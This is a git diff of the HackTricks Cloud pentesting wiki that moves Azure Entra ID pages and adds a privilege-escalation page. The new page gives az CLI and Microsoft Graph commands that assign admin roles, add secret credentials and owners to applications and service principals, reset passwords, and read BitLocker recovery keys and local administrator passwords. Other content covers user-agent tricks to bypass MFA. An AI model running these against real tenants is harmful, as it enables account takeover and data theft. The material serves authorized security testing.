diff --git a/.gitbook/assets/image (354).png b/.gitbook/assets/image (354).png new file mode 100644 index 0000000000..dcfef5337f Binary files /dev/null and b/.gitbook/assets/image (354).png differ diff --git a/.gitbook/assets/image (355).png b/.gitbook/assets/image (355).png new file mode 100644 index 0000000000..6de67ca7e0 Binary files /dev/null and b/.gitbook/assets/image (355).png differ diff --git a/.gitbook/assets/image (356).png b/.gitbook/assets/image (356).png new file mode 100644 index 0000000000..c1cfc0e35e Binary files /dev/null and b/.gitbook/assets/image (356).png differ diff --git a/SUMMARY.md b/SUMMARY.md index 4ab2714346..e7707281d3 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -399,6 +399,7 @@ * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) * [Az - Services](pentesting-cloud/azure-security/az-services/README.md) + * [Az - Entra ID (formerly AzureAD - AAD)](pentesting-cloud/azure-security/az-services/az-azuread.md) * [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md) * [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md) * [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md) @@ -440,14 +441,14 @@ * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) * [Az - Authorization Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) + * [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) + * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) + * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) * [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md) - * [Az - Entra ID (formerly AzureAD - AAD)](pentesting-cloud/azure-security/az-azuread/README.md) - * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass.md) - * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-azuread/dynamic-groups.md) * [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md) * [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md) * [DO - Permissions for a Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md) diff --git a/pentesting-cloud/azure-security/README.md b/pentesting-cloud/azure-security/README.md index a20f61e754..4b8dfaf467 100644 --- a/pentesting-cloud/azure-security/README.md +++ b/pentesting-cloud/azure-security/README.md @@ -88,7 +88,7 @@ After bypassing it, you might be able to get back to your initial setup and you ### Whoami {% hint style="danger" %} -Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-azuread/) section. +Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section. {% endhint %} One of the first things you need to know is **who you are** (in which environment you are): @@ -144,8 +144,8 @@ You can get the same info in the **web console** going to [https://portal.azure. By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\ You can find here a guide: -{% content-ref url="az-azuread/" %} -[az-azuread](az-azuread/) +{% content-ref url="az-services/az-azuread.md" %} +[az-azuread.md](az-services/az-azuread.md) {% endcontent-ref %} {% hint style="info" %} diff --git a/pentesting-cloud/azure-security/az-basic-information/README.md b/pentesting-cloud/azure-security/az-basic-information/README.md index 7380bd58c3..78dd6d5511 100644 --- a/pentesting-cloud/azure-security/az-basic-information/README.md +++ b/pentesting-cloud/azure-security/az-basic-information/README.md @@ -17,7 +17,7 @@ Learn & practice GCP Hacking:
+

https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png

### Management Groups @@ -390,14 +390,6 @@ However, in some cases you might want to provide **more fined-grained access man Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\ You **cannot** explicitly **deny** **access** to specific resources **using conditions**. -### Privileged Identity Management (PIM) - -Privileged Identity Management (PIM) in Azure is a tool that **manages, controls, and monitors privileged access** in Azure Active Directory and Azure. It enhances security by providing **just-in-time and time-limited privileged access**, **enforcing approval workflows, and requiring additional authentication**. This approach minimizes the risk of unauthorized access by ensuring that elevated permissions are granted only when necessary and for a specific duration. - -## - - - ## References * [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview) diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md new file mode 100644 index 0000000000..500bfae82b --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md @@ -0,0 +1,384 @@ +# Az - EntraID Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +{% hint style="info" %} +Note that **not all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.** +{% endhint %} + +## Roles + +### Role: Privileged Role Administrator + +This role contains the necessary granular permissions to be able to assign roles to principals and to give more permissions to roles. Both actions could be abused to escalate privileges. + +* Assign role to a user: + +```bash +# List enabled built-in roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directoryRoles" + +# Give role (Global Administrator?) to a user +roleId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \ + --headers "Content-Type=application/json" \ + --body "{ + \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\" + }" +``` + +* Add more permissions to a role: + +```bash +# List only custom roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)' + +# Change the permissions of a custom role +az rest --method PATCH \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/" \ + --headers "Content-Type=application/json" \ + --body '{ + "description": "Update basic properties of application registrations", + "rolePermissions": [ + { + "allowedResourceActions": [ + "microsoft.directory/applications/credentials/update" + ] + } + ] + }' +``` + +## Applications + +### `microsoft.directory/applications/credentials/update` + +This allows an attacker to **add credentials** (passwords or certificates) to existing applications. If the application has privileged permissions, the attacker can authenticate as that application and gain those privileges. + +```bash +# Generate a new password without overwritting old ones +az ad app credential reset --id --append +# Generate a new certificate without overwritting old ones +az ad app credential reset --id --create-cert +``` + +### `microsoft.directory/applications.myOrganization/credentials/update` + +This allows the same actions as `applications/credentials/update`, but scoped to single-directory applications. + +```bash +az ad app credential reset --id --append +``` + +### `microsoft.directory/applications/owners/update` + +**Description**: Update owners of applications\ +**Abuse Potential**: By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions. + +```bash +az ad app owner add --id --owner-object-id +az ad app credential reset --id --append + +# You can check the owners with +az ad app owner list --id +``` + +## Service Principals + +### `microsoft.directory/servicePrincipals/credentials/update` + +This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges. + +```bash +az ad sp credential reset --id --append +``` + +{% hint style="danger" %} +The new generated password won't appear in the web console, so this could be a stealth way to maintain persistence over a service principal.\ +From the API they can be found with: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json` +{% endhint %} + +If you get the error `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` it's because **it's not possible to modify the passwordCredentials property** of the SP and first you need to unlock it. For it you need a permission (`microsoft.directory/applications/allProperties/update`) that allows you to execute: + +{% code overflow="wrap" %} +```bash +az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/ --body '{"servicePrincipalLockConfiguration": null}' +``` +{% endcode %} + +### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage` + +This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges. + +```bash +az ad sp credential reset --id --append +``` + +### `microsoft.directory/servicePrincipals/owners/update` + +Similar to applications, owning a service principal allows control over its credentials and permissions. + +```bash +# Add new owner +spId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \ + --headers "Content-Type=application/json" \ + --body "{ + \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\" + }" + +az ad sp credential reset --id --append + +# You can check the owners with +az ad sp owner list --id +``` + +{% hint style="danger" %} +After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't supported, even if it's the method you need to use to delete the owner. So you **can't remove owners nowadays**. +{% endhint %} + +### `microsoft.directory/servicePrincipals/disable` and `enable` + +These permissions allows to disable and enable service principals. An attacker could use this permission to enable a service principal he could get access to somehow to escalate privileges. + +Note that for this technique the attacker will need more permissions in order to take over the enabled service principal. + +```bash +bashCopy code# Disable +az ad sp update --id --account-enabled false + +# Enable +az ad sp update --id --account-enabled true +``` + +#### `microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials` + +These permissions allow to create and get credentials for single sign-on which could allow access to third-party applications. + +{% code overflow="wrap" %} +```bash +# Generate SSO creds for a user or a group +spID="" +user_or_group_id="" +username="" +password="" +az rest --method POST \ + --uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \ + --headers "Content-Type=application/json" \ + --body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}" + + +# Get credentials of a specific credID +credID="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \ + --headers "Content-Type=application/json" \ + --body "{\"id\": \"$credID\"}" +``` +{% endcode %} + +*** + +## Groups + +### `microsoft.directory/groups/allProperties/update` + +This permission allows to add users to privileged groups, leading to privilege escalation. + +```bash +az ad group member add --group --member-id +``` + +**Note**: This permission excludes Entra ID role-assignable groups. + +### `microsoft.directory/groups/owners/update` + +This permission allows to become an owner of groups. An owner of a group can control group membership and settings, potentially escalating privileges to the group. + +```bash +az ad group owner add --group --owner-object-id +az ad group member add --group --member-id +``` + +**Note**: This permission excludes Entra ID role-assignable groups. + +### `microsoft.directory/groups/members/update` + +This permission allows to add members to a group. An attacker could add himself or malicious accounts to privileged groups can grant elevated access. + +```bash +az ad group member add --group --member-id +``` + +### `microsoft.directory/groups/dynamicMembershipRule/update` + +This permission allows to update membership rule in a dynamic group. An attacker could modify dynamic rules to include himself in privileged groups without explicit addition. + +```bash +groupId="" +az rest --method PATCH \ + --uri "https://graph.microsoft.com/v1.0/groups/$groupId" \ + --headers "Content-Type=application/json" \ + --body '{ + "membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")", + "membershipRuleProcessingState": "On" + }' +``` + +**Note**: This permission excludes Entra ID role-assignable groups. + +### Dynamic Groups Privesc + +It might be possible for users to escalate privileges modifying their own properties to be added as members of dynamic groups. For more info check: + +{% content-ref url="dynamic-groups.md" %} +[dynamic-groups.md](dynamic-groups.md) +{% endcontent-ref %} + +## Users + +### `microsoft.directory/users/password/update` + +This permission allows to reset password to non-admin users, allowing a potential attacker to escalate privileges to other users. + +```bash +az ad user update --id --password "kweoifuh.234" +``` + +### `microsoft.directory/users/basic/update` + +This privilege allows to modify properties of the user. It's common to find dynamic groups that add users based on properties values, therefore, this permission could allow a user to set the needed property value to be a member to a specific dynamic group and escalate privileges. + +{% code overflow="wrap" %} +```bash +#e.g. change manager of a user +victimUser="" +managerUser="" +az rest --method PUT \ + --uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \ + --headers "Content-Type=application/json" \ + --body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}' + +#e.g. change department of a user +az rest --method PATCH \ + --uri "https://graph.microsoft.com/v1.0/users/$victimUser" \ + --headers "Content-Type=application/json" \ + --body "{\"department\": \"security\"}" +``` +{% endcode %} + +## Conditional Access Policies & MFA bypass + +Misconfigured conditional access policies requiring MFA could be bypassed, check: + +{% content-ref url="az-conditional-access-policies-mfa-bypass.md" %} +[az-conditional-access-policies-mfa-bypass.md](az-conditional-access-policies-mfa-bypass.md) +{% endcontent-ref %} + +## Devices + +### `microsoft.directory/devices/registeredOwners/update` + +This permission allows attackers to assigning themselves as owners of devices to gain control or access to device-specific settings and data. + +```bash +deviceId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \ + --headers "Content-Type=application/json" \ + --body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}' +``` + +### `microsoft.directory/devices/registeredUsers/update` + +This permission allows attackers to associate their account with devices to gain access or to bypass security policies. + +```bash +deviceId="" +userId="" +az rest --method POST \ + --uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \ + --headers "Content-Type=application/json" \ + --body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}' +``` + +### `microsoft.directory/deviceLocalCredentials/password/read` + +This permission allows attackers to read the properties of the backed up local administrator account credentials for Microsoft Entra joined devices, including the password + +{% code overflow="wrap" %} +```bash +# List deviceLocalCredentials +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials" + +# Get credentials +deviceLC="" +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \ +``` +{% endcode %} + +## BitlockerKeys + +### `microsoft.directory/bitlockerKeys/key/read` + +This permission allows to access BitLocker keys, which could allow an attacker to decrypt drives, compromising data confidentiality. + +{% code overflow="wrap" %} +```bash +# List recovery keys +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys" + +# Get key +recoveryKeyId="" +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key" +``` +{% endcode %} + +## Other Interesting permissions (TODO) + +* `microsoft.directory/applications/permissions/update` +* `microsoft.directory/servicePrincipals/permissions/update` +* `microsoft.directory/applications.myOrganization/allProperties/update` +* `microsoft.directory/applications/allProperties/update` +* `microsoft.directory/servicePrincipals/appRoleAssignedTo/update` +* `microsoft.directory/applications/appRoles/update` +* `microsoft.directory/applications.myOrganization/permissions/update` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md similarity index 87% rename from pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass.md rename to pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md index 8196bd2457..907031d6b3 100644 --- a/pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass.md +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -1,8 +1,8 @@ # Az - Conditional Access Policies & MFA Bypass {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -50,12 +50,12 @@ The possible **results** are: Block or Grant access with potential conditions li It's possible to set a condition based on the **device platform** (Android, iOS, Windows, macOS...), however, this is based on the **user-agent** so it's easy to bypass. Even **making all the options enforce MFA**, if you use a **user-agent that it isn't recognized,** you will be able to bypass the MFA or block: -
+
Just making the browser **send an unknown user-agent** (like `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is enough to not trigger this condition.\ You can change the user agent **manually** in the developer tools: -
+
Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en). @@ -67,7 +67,7 @@ If this is set in the conditional policy, an attacker could just use a **VPN** i It's possible to configure **conditional access policies to block or force** for example MFA when a user tries to access **specific app**: -
+
To try to bypass this protection you should see if you can **only into any application**.\ The tool [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) has **tens of application IDs hardcoded** and will try to login into them and let you know and even give you the token if successful. @@ -116,8 +116,8 @@ Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken Find more information about this kind of attack in the following page: -{% content-ref url="../az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} -[pass-the-prt.md](../az-lateral-movement-cloud-on-prem/pass-the-prt.md) +{% content-ref url="../../az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} +[pass-the-prt.md](../../az-lateral-movement-cloud-on-prem/pass-the-prt.md) {% endcontent-ref %} ## Tooling @@ -198,8 +198,8 @@ $data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl * [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
diff --git a/pentesting-cloud/azure-security/az-azuread/dynamic-groups.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md similarity index 75% rename from pentesting-cloud/azure-security/az-azuread/dynamic-groups.md rename to pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md index 764e006a58..18b0e7b821 100644 --- a/pentesting-cloud/azure-security/az-azuread/dynamic-groups.md +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md @@ -1,8 +1,8 @@ # Az - Dynamic Groups Privesc {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -63,8 +63,8 @@ az rest --method GET \ * [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
diff --git a/pentesting-cloud/azure-security/az-azuread/README.md b/pentesting-cloud/azure-security/az-services/az-azuread.md similarity index 88% rename from pentesting-cloud/azure-security/az-azuread/README.md rename to pentesting-cloud/azure-security/az-services/az-azuread.md index b5bbd26da1..3f146ec5f3 100644 --- a/pentesting-cloud/azure-security/az-azuread/README.md +++ b/pentesting-cloud/azure-security/az-services/az-azuread.md @@ -21,7 +21,7 @@ Azure Active Directory (Azure AD) serves as Microsoft's cloud-based service for Key features of Azure AD involve **multi-factor authentication** and **conditional access**, alongside seamless integration with other Microsoft security services. These features significantly elevate the security of user identities and empower organizations to effectively implement and enforce their access policies. As a fundamental component of Microsoft's cloud services ecosystem, Azure AD is pivotal for the cloud-based management of user identities. -## Entities +## Enumeration ### **Connection** @@ -329,8 +329,8 @@ $password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText It's highly recommended to add MFA to every user, however, some companies won't set it or might set it with a Conditional Access: The user will be **required MFA if** it logs in from an specific location, browser or **some condition**. These policies, if not configured correctly might be prone to **bypasses**. Check: -{% content-ref url="az-conditional-access-policies-mfa-bypass.md" %} -[az-conditional-access-policies-mfa-bypass.md](az-conditional-access-policies-mfa-bypass.md) +{% content-ref url="../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md" %} +[az-conditional-access-policies-mfa-bypass.md](../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) {% endcontent-ref %} ### Groups @@ -431,8 +431,8 @@ Groups can be dynamic, which basically means that **if a user fulfil certain con Check how to abuse dynamic groups in the following page: {% endhint %} -{% content-ref url="dynamic-groups.md" %} -[dynamic-groups.md](dynamic-groups.md) +{% content-ref url="../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md" %} +[dynamic-groups.md](../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) {% endcontent-ref %} ### Service Principals @@ -698,7 +698,7 @@ The **owner** of the **application** can **add a password** to it (so he can imp Logins as these service principals are **not marked as risky** and they **won't have MFA.** {% endhint %} -It's possible to find a list of the App IDs that belongs to Microsoft in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications) +It's possible to find a list of commonly used App IDs that belongs to Microsoft in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications) ### Managed Identities @@ -718,9 +718,9 @@ az identity list --output table {% endtab %} {% endtabs %} -### Roles +### Azure Roles -For more information about Azure and Entra ID roles check: +For more information about Azure roles check: {% content-ref url="../az-basic-information/" %} [az-basic-information](../az-basic-information/) @@ -747,23 +747,6 @@ az role assignment list --all --query "[].{principalName:principalName,principal ``` {% endtab %} -{% tab title="Azure AD" %} -```powershell -# Get all available role templates -Get-AzureADDirectoryroleTemplate -# Get enabled roles (Assigned roles) -Get-AzureADDirectoryRole -Get-AzureADDirectoryRole -ObjectId #Get info about the role -# Get custom roles - use AzureAdPreview -Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName -# Users assigned a role (Global Administrator) -Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember -Get-AzureADDirectoryRole -ObjectId | fl -# Roles of the Administrative Unit (who has permissions over the administrative unit and its members) -Get-AzureADMSScopedRoleMembership -Id | fl * -``` -{% endtab %} - {% tab title="Az PowerShell" %} ```powershell # Get role assignments on the subscription @@ -793,6 +776,59 @@ $RequestParams = @{ {% endtab %} {% endtabs %} +### Entra ID Roles + +For more information about Azure roles check: + +{% content-ref url="../az-basic-information/" %} +[az-basic-information](../az-basic-information/) +{% endcontent-ref %} + +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} +```bash +# List temaplte roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directoryRoleTemplates" + +# List enabled built-in roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directoryRoles" + +# List all roles with their permissions (including custom roles) +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" + +# List only custom roles +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)' + +# List members of a role +az rest --method GET \ + --uri "https://graph.microsoft.com/v1.0/directoryRoles//members" +``` +{% endcode %} +{% endtab %} + +{% tab title="Azure AD" %} +```powershell +# Get all available role templates +Get-AzureADDirectoryroleTemplate +# Get enabled roles (Assigned roles) +Get-AzureADDirectoryRole +Get-AzureADDirectoryRole -ObjectId #Get info about the role +# Get custom roles - use AzureAdPreview +Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName +# Users assigned a role (Global Administrator) +Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember +Get-AzureADDirectoryRole -ObjectId | fl +# Roles of the Administrative Unit (who has permissions over the administrative unit and its members) +Get-AzureADMSScopedRoleMembership -Id | fl * +``` +{% endtab %} +{% endtabs %} + ### Devices {% tabs %} @@ -866,21 +902,57 @@ Get-AzureADMSScopedRoleMembership -Id | fl #Get role ID and role members {% endtab %} {% endtabs %} -## Azure AD Identity Protection (AIP) +## Privilege Escalation + +{% content-ref url="../az-privilege-escalation/" %} +[az-privilege-escalation](../az-privilege-escalation/) +{% endcontent-ref %} + +## Defensive Mechanisms + +### Privileged Identity Management (PIM) + +Privileged Identity Management (PIM) in Azure helps to **prevent excessive privileges** to being assigned to users unnecessarily. + +One of the main features provided by PIM is that It allows to not assign roles to principals that are constantly active, but make them **eligible for a period of time (e.g. 6months)**. Then, whenever the user wants to activate that role, he needs to ask for it indicating the time he needs the privilege (e.g. 3 hours). Then an **admin needs to approve** the request.\ +Note that the user will also be able to ask to **extend** the time. + +Moreover, **PIM send emails** whenever a privileged role is being assigned to someone. + +
+ +### Conditional Access Policies + +Check: + +{% content-ref url="../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md" %} +[az-conditional-access-policies-mfa-bypass.md](../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) +{% endcontent-ref %} + +### Entra Identity Protection + +Entra Identity Protection is a security service that allows to **detect when a user or a sign-in is too risky** to be accepted, allowing to **block** the user or the sig-in attempt. + +It allows the admin to configure it to **block** attempts when the risk is "Low and above", "Medium and above" or "High". Although, by default it's completely **disabled**: + +
